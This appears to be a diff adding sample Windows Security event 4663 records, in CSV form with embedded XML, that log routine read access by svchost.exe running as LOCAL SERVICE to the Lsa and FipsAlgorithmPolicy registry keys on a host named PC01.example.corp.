+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.215261Z"">
+    </TimeCreated>
+    <EventRecordID>452826</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.215261+04:00,1553038515.215261,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.215261Z"">
+    </TimeCreated>
+    <EventRecordID>452825</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.215261+04:00,1553038515.215261,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.215261Z"">
+    </TimeCreated>
+    <EventRecordID>452824</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.215261+04:00,1553038515.215261,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.205246Z"">
+    </TimeCreated>
+    <EventRecordID>452823</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.205246+04:00,1553038515.205246,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.185218Z"">
+    </TimeCreated>
+    <EventRecordID>452822</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.185218+04:00,1553038515.185218,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.185218Z"">
+    </TimeCreated>
+    <EventRecordID>452821</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.185218+04:00,1553038515.185218,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.045016Z"">
+    </TimeCreated>
+    <EventRecordID>452820</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.045016+04:00,1553038515.045016,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.045016Z"">
+    </TimeCreated>
+    <EventRecordID>452819</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.045016+04:00,1553038515.045016,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:14.904814Z"">
+    </TimeCreated>
+    <EventRecordID>452818</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:14.904814+04:00,1553038514.904814,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:14.904814Z"">
+    </TimeCreated>
+    <EventRecordID>452817</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:14.904814+04:00,1553038514.904814,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:14.764613Z"">
+    </TimeCreated>
+    <EventRecordID>452816</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:14.764613+04:00,1553038514.764613,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:14.764613Z"">
+    </TimeCreated>
+    <EventRecordID>452815</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:14.764613+04:00,1553038514.764613,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:14.634426Z"">
+    </TimeCreated>
+    <EventRecordID>452814</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:14.634426+04:00,1553038514.634426,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:14.634426Z"">
+    </TimeCreated>
+    <EventRecordID>452813</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+1601-01-01T04:00:00+04:00,-11644473600.0,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.365477Z"">
+    </TimeCreated>
+    <EventRecordID>452922</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.365477Z"">
+    </TimeCreated>
+    <EventRecordID>452921</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.365477Z"">
+    </TimeCreated>
+    <EventRecordID>452920</EventRecordID>
+    <Correlation>
